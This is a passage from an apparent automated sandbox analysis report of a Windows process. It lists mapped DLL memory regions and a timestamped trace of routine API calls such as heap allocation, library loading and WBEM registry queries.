"c:\\windows\\syswow64\\win32u.dll") Region: id = 852 start_va = 0x77240000 end_va = 0x77262fff monitored = 0 entry_point = 0x772473c0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 853 start_va = 0x76910000 end_va = 0x769eafff monitored = 0 entry_point = 0x7696fc10 region_type = mapped_file name = "gdi32full.dll" filename = "\\Windows\\SysWOW64\\gdi32full.dll" (normalized: "c:\\windows\\syswow64\\gdi32full.dll") Region: id = 854 start_va = 0x77530000 end_va = 0x775aafff monitored = 0 entry_point = 0x77547800 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\SysWOW64\\msvcp_win.dll" (normalized: "c:\\windows\\syswow64\\msvcp_win.dll") Region: id = 855 start_va = 0x1c0000 end_va = 0x1c7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 856 start_va = 0x680000 end_va = 0x800fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 857 start_va = 0xc20000 end_va = 0xe1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c20000" filename = "" Region: id = 858 start_va = 0xe20000 end_va = 0xee0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 859 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 860 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 861 start_va = 0x1f0000 end_va = 0x1f4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 862 start_va = 0x756c0000 end_va = 0x756cefff monitored = 0 entry_point = 0x756c4830 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 863 start_va = 0x776e0000 end_va = 0x7773bfff monitored = 0 entry_point = 0x77710900 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 864 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 865 start_va = 0x450000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 866 start_va = 0x410000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 867 start_va = 0x620000 end_va = 0x65ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 868 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 869 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 870 start_va = 0xef0000 end_va = 0xfeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ef0000" filename = "" Region: id = 871 start_va = 0x810000 end_va = 0x810fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 872 start_va = 0x76770000 end_va = 0x767edfff monitored = 0 entry_point = 0x767dbd50 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 873 start_va = 0x820000 end_va = 0x820fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 874 start_va = 0x70fa0000 end_va = 0x70facfff monitored = 0 entry_point = 0x70fa3550 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 875 start_va = 0x75f90000 end_va = 0x75ff2fff monitored = 0 entry_point = 0x75f94b40 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 876 start_va = 0x76870000 end_va = 0x7690afff monitored = 0 entry_point = 0x768a5a20 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 877 start_va = 0xff0000 end_va = 0x10d1fff monitored = 0 entry_point = 0x101c600 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 878 start_va = 0x830000 end_va = 0x86ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000830000" filename = "" Region: id = 879 start_va = 0xff0000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ff0000" filename = "" Region: id = 880 start_va = 0x1030000 end_va = 0x106ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001030000" filename = "" Region: id = 881 start_va = 0x1070000 end_va = 0x10affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001070000" filename = "" Region: id = 882 start_va = 0x10b0000 end_va = 0x10effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010b0000" filename = "" Region: id = 883 start_va = 0x10f0000 end_va = 0x112ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010f0000" filename = "" Region: id = 884 start_va = 0x1130000 end_va = 0x1130fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001130000" filename = "" Region: id = 885 start_va = 0x1140000 end_va = 0x1140fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001140000" filename = "" Region: id = 886 start_va = 0x6fc00000 end_va = 0x6fc0ffff monitored = 0 entry_point = 0x6fc090e0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 887 start_va = 0x6fb20000 end_va = 0x6fb2ffff monitored = 0 entry_point = 0x6fb28cd0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 888 start_va = 0x75660000 end_va = 0x75684fff monitored = 0 entry_point = 0x75668820 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 889 start_va = 0x75190000 end_va = 0x751a7fff monitored = 0 entry_point = 0x7519a250 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 890 start_va = 0x6fae0000 end_va = 0x6fb17fff monitored = 0 entry_point = 0x6fb03160 region_type = mapped_file name = "mpoav.dll" filename = "\\Program Files (x86)\\Windows Defender\\MpOAV.dll" (normalized: "c:\\program files (x86)\\windows defender\\mpoav.dll") Region: id = 891 start_va = 0x775f0000 end_va = 0x776d2fff monitored = 0 entry_point = 0x7761c600 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 892 start_va = 0x75690000 end_va = 0x75697fff monitored = 0 entry_point = 0x75691800 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 893 start_va = 0x1150000 end_va = 0x118ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001150000" filename = "" Region: id = 894 start_va = 0x1190000 end_va = 0x11cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001190000" filename = "" Region: id = 895 start_va = 0x11d0000 end_va = 0x120ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011d0000" filename = "" Region: id = 896 start_va = 0x1210000 end_va = 0x124ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001210000" filename = "" Region: id = 897 start_va = 0x6faa0000 end_va = 0x6fabcfff monitored = 0 entry_point = 0x6faaa8a0 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\SysWOW64\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wmiutils.dll") Region: id = 898 start_va = 0x6fa80000 end_va = 0x6fa9dfff monitored = 0 entry_point = 0x6fa86490 region_type = mapped_file name = "stdprov.dll" filename = "\\Windows\\SysWOW64\\wbem\\stdprov.dll" (normalized: "c:\\windows\\syswow64\\wbem\\stdprov.dll") Region: id = 899 start_va = 0x6fd70000 end_va = 0x6fd98fff monitored = 0 entry_point = 0x6fd77e90 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 900 start_va = 0x75250000 end_va = 0x75270fff monitored = 0 entry_point = 0x7525ca40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 901 start_va = 0x6fa20000 end_va = 0x6fa7ffff monitored = 0 entry_point = 0x6fa35720 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\SysWOW64\\wbem\\esscli.dll" (normalized: "c:\\windows\\syswow64\\wbem\\esscli.dll") Region: id = 903 start_va = 0x1250000 end_va = 0x1258fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001250000" filename = "" Thread: id = 83 os_tid = 0xbfc [0315.847] malloc (_Size=0x80) returned 0x670d80 [0315.847] __dllonexit () returned 0x6fc30850 [0315.847] __dllonexit () returned 0x6fc30860 [0315.848] __dllonexit () returned 0x6fc30870 [0315.848] GetProcessHeap () returned 0x450000 [0315.848] __dllonexit () returned 0x6fc30880 [0315.848] GetProcessHeap () returned 0x450000 [0315.848] __dllonexit () returned 0x6fc30890 [0315.848] __dllonexit () returned 0x6fc308a0 [0315.848] GetTickCount () returned 0x1e80c3f [0315.848] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x114 [0315.849] LoadLibraryExW (lpLibFileName="API-MS-Win-Core-LocalRegistry-L1-1-0.dll", hFile=0x0, dwFlags=0x8) returned 0x77310000 [0315.849] GetProcAddress (hModule=0x77310000, lpProcName="RegCreateKeyExW") returned 0x77412a40 [0315.849] RegCreateKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\WBEM\\CIMOM", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0xdf80c, lpdwDisposition=0xdf7cc | out: phkResult=0xdf80c*=0x0, lpdwDisposition=0xdf7cc*=0x2) returned 0x5 [0315.850] GetSystemDirectoryW (in: lpBuffer=0x6fc6d64c, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0315.851] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WBEM\\Logs\\" (normalized: "c:\\windows\\syswow64\\wbem\\logs")) returned 0x10 [0315.851] GetLastError () returned 0x0 [0315.851] RegCreateKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\WBEM\\CIMOM", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0xdf810, lpdwDisposition=0xdf7d0 | out: phkResult=0xdf810*=0x0, lpdwDisposition=0xdf7d0*=0x2) returned 0x5 [0315.859] _vsnwprintf (in: _Buffer=0xdf7b0, _BufferCount=0x1d, _Format="%d", _ArgList=0xdf7a0 | out: _Buffer="1") returned 1 [0315.860] _vsnwprintf (in: _Buffer=0xdf7b0, _BufferCount=0x1d, _Format="%d", _ArgList=0xdf7a0 | out: _Buffer="65536") returned 5 [0315.860] __dllonexit () returned 0x6fc308b0 [0315.860] __dllonexit () returned 0x6fc308c0 [0315.860] __dllonexit () returned 0x6fc308d0 [0315.860] __dllonexit () returned 0x6fc308e0 [0315.861] __dllonexit () returned 0x6fc308f0 [0315.861] DisableThreadLibraryCalls (hLibModule=0x6fc10000) returned 1 [0315.861] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xc) returned 0x458188 [0315.861] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x45c100 [0315.861] GetVersion () returned 0x4a61000a [0315.861] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77840000 [0315.861] GetProcAddress (hModule=0x77840000, lpProcName="EtwRegisterTraceGuidsW") returned 0x778a4ab0 [0315.861] EtwRegisterTraceGuidsW () returned 0x0 [0315.862] EtwRegisterTraceGuidsW () returned 0x0 [0315.863] GetProcAddress (hModule=0x77310000, lpProcName="RegOpenKeyExW") returned 0x77414e60 [0315.863] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\WBEM", ulOptions=0x0, samDesired=0x20019, phkResult=0xdf838 | out: phkResult=0xdf838*=0x120) returned 0x0 [0315.864] GetProcAddress (hModule=0x77310000, lpProcName="RegQueryValueExW") returned 0x774148b0 [0315.864] RegQueryValueExW (in: hKey=0x120, lpValueName="AmsiEnable", lpReserved=0x0, lpType=0xdf814, lpData=0xdf848, lpcbData=0xdf810*=0x4 | out: lpType=0xdf814*=0x0, lpData=0xdf848*=0x1, lpcbData=0xdf810*=0x4) returned 0x2 [0315.864] GetProcAddress (hModule=0x77310000, lpProcName="RegCloseKey") returned 0x77415f90 [0315.864] RegCloseKey (hKey=0x120) returned 0x0 [0316.054] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xc) returned 0x474760 [0316.054] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x8) returned 0x462410 [0316.054] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x474760) returned 1 [0316.063] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x474748 [0316.063] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x4) returned 0x462420 [0316.064] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1a) returned 0x462b68 [0316.065] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x22) returned 0x472cd8 [0316.065] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x462b68) returned 1 [0316.121] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x14) returned 0x471438 [0316.121] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x24) returned 0x483e00 [0316.121] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x44) returned 0x468830 [0316.121] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x14) returned 0x471358 [0316.121] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x24) returned 0x483ef0 [0316.121] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1a) returned 0x4821d0 [0316.122] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x14) returned 0x471138 [0316.122] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x24) returned 0x483f20 [0316.122] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x28) returned 0x483f50 [0316.122] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x14) returned 0x471158 [0316.122] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x24) returned 0x483e30 [0316.122] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x24) returned 0x483e60 [0316.122] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x14) returned 0x471198 [0316.122] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x24) returned 0x483980 [0316.122] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x26) returned 0x483a40 [0316.122] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x14) returned 0x4711b8 [0316.122] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x24) returned 0x483a70 [0316.123] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x26) returned 0x483bf0 [0316.123] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x20) returned 0x481fc8 [0316.123] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x24) returned 0x483da0 [0316.123] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x5a) returned 0x4818a0 [0316.123] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x24) returned 0x4839b0 [0316.123] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x5e) returned 0x481908 [0316.123] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x4846a8 [0316.123] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x24) returned 0x483d70 [0316.123] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x64) returned 0x483760 [0316.123] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x20) returned 0x4820e0 [0316.123] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x24) returned 0x4839e0 [0316.124] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x68) returned 0x483450 [0316.124] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x4849a8 [0316.124] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x24) returned 0x483c80 [0316.124] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x5c) returned 0x484a20 [0316.124] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x20) returned 0x482270 [0316.124] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x24) returned 0x483860 [0316.124] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x56) returned 0x484a88 [0316.124] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x14) returned 0x484908 [0316.124] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x24) returned 0x4838c0 [0316.124] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x46) returned 0x468880 [0316.124] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x14) returned 0x4849c8 [0316.125] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x24) returned 0x483950 [0316.125] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x86) returned 0x484ae8 [0316.125] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x14) returned 0x484928 [0316.125] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x24) returned 0x4838f0 [0316.125] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x56) returned 0x484b78 [0316.125] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x14) returned 0x4847e8 [0316.125] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x24) returned 0x483ce0 [0316.125] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x4e) returned 0x478268 [0316.125] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x14) returned 0x484888 [0316.125] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x24) returned 0x483920 [0316.125] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x48) returned 0x468380 [0316.126] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x78) returned 0x471d10 [0316.127] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x4812d8 [0316.128] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x4849e8 [0316.129] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x484828 [0316.130] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-0.dll", hFile=0x0, dwFlags=0x8) returned 0x77310000 [0316.130] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-obsolete-l1-1-0.dll", hFile=0x0, dwFlags=0x8) returned 0x77310000 [0316.131] GetProcAddress (hModule=0x77310000, lpProcName="GetThreadPreferredUILanguages") returned 0x77433270 [0316.131] GetProcAddress (hModule=0x77310000, lpProcName="SetThreadPreferredUILanguages") returned 0x77423e40 [0316.131] GetProcAddress (hModule=0x77310000, lpProcName="LocaleNameToLCID") returned 0x77438150 [0316.131] GetProcAddress (hModule=0x77310000, lpProcName="GetLocaleInfoEx") returned 0x77424df0 [0316.131] GetProcAddress (hModule=0x77310000, lpProcName="LCIDToLocaleName") returned 0x774382d0 [0316.132] GetProcAddress (hModule=0x77310000, lpProcName="GetSystemDefaultLocaleName") returned 0x77472370 [0316.132] RtlRestoreLastWin32Error () returned 0x271000 [0316.132] GetThreadPreferredUILanguages (in: dwFlags=0x30, pulNumLanguages=0xdfcf0, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xdfc40 | out: pulNumLanguages=0xdfcf0, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xdfc40) returned 1 [0316.132] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x484948 [0316.132] RtlRestoreLastWin32Error () returned 0x271000 [0316.132] GetThreadPreferredUILanguages (in: dwFlags=0x30, pulNumLanguages=0xdfcf0, pwszLanguagesBuffer=0x484948, pcchLanguagesBuffer=0xdfc40 | out: pulNumLanguages=0xdfcf0, pwszLanguagesBuffer=0x484948, pcchLanguagesBuffer=0xdfc40) returned 1 [0316.132] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x4848c8 [0316.132] LocaleNameToLCID (lpName="en-US", dwFlags=0x0) returned 0x409 [0316.133] LocaleNameToLCID (lpName="en", dwFlags=0x0) returned 0x409 [0316.134] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x484948) returned 1 [0316.134] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x12) returned 0x484948 [0316.152] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x28) returned 0x483cb0 [0316.152] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x48) returned 0x4683d0 [0316.157] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x2c) returned 0x45fc88 [0316.157] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x2000) returned 0x485110 [0316.195] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UAGKXZ () returned 0x2 [0316.201] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x484948) returned 1 [0316.201] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4848c8) returned 1 [0316.201] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4812d8) returned 1 [0316.201] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4849e8) returned 1 [0316.201] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x484828) returned 1 [0316.203] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x471d10) returned 1 [0316.204] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x472cd8) returned 1 [0316.204] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x462420) returned 1 [0316.205] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x474748) returned 1 [0316.205] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x5e) returned 0x48b9d8 [0316.206] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x52) returned 0x4817e0 [0316.207] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4817e0) returned 1 [0316.207] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x16) returned 0x4847c8 [0316.207] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4847c8) returned 1 [0316.207] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x48b9d8) returned 1 [0316.220] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xc) returned 0x481350 [0316.220] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x190) returned 0x48cf18 [0316.221] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x481140 [0316.222] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\WBEM\\CIMOM", ulOptions=0x0, samDesired=0x20019, phkResult=0xdf460 | out: phkResult=0xdf460*=0x254) returned 0x0 [0316.222] RegQueryValueExW (in: hKey=0x254, lpValueName="EnableObjectValidation", lpReserved=0x0, lpType=0xdf400, lpData=0xdf408, lpcbData=0xdf3fc*=0x19 | out: lpType=0xdf400*=0x0, lpData=0xdf408*=0x0, lpcbData=0xdf3fc*=0x19) returned 0x2 [0316.222] RegCloseKey (hKey=0x254) returned 0x0 [0316.222] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x481140) returned 1 [0316.222] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x481350) returned 1 [0316.222] ResolveDelayLoadedAPI () returned 0x7688ebb0 [0316.224] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x48cf18) returned 1 [0316.224] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x5c) returned 0x48b768 [0316.224] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x48c4f8 [0316.225] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x48c4f8) returned 1 [0316.225] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x16) returned 0x484768 [0316.225] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x484768) returned 1 [0316.225] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x48b768) returned 1 [0316.228] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xc) returned 0x481128 [0316.229] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x190) returned 0x48cf18 [0316.229] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x481140 [0316.229] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x481140) returned 1 [0316.229] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x481128) returned 1 [0316.230] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x48cf18) returned 1 [0316.230] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x66) returned 0x483140 [0316.230] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x5a) returned 0x48bbe0 [0316.230] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x48bbe0) returned 1 [0316.231] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x16) returned 0x484828 [0316.231] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x484828) returned 1 [0316.231] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x483140) returned 1 [0316.233] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xc) returned 0x4812a8 [0316.233] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x190) returned 0x48cfe8 [0316.233] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x481350 [0316.234] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x481350) returned 1 [0316.234] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4812a8) returned 1 [0316.235] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x48cfe8) returned 1 [0316.237] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4683d0) returned 1 [0316.237] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x483cb0) returned 1 [0316.237] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x462410) returned 1 Thread: id = 84 os_tid = 0x7ec Thread: id = 85 os_tid = 0x688 Thread: id = 86 os_tid = 0x16b0 Thread: id = 87 os_tid = 0xac0 [0316.280] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x78) returned 0x471a90 [0316.280] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x481380 [0316.280] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x481380) returned 1 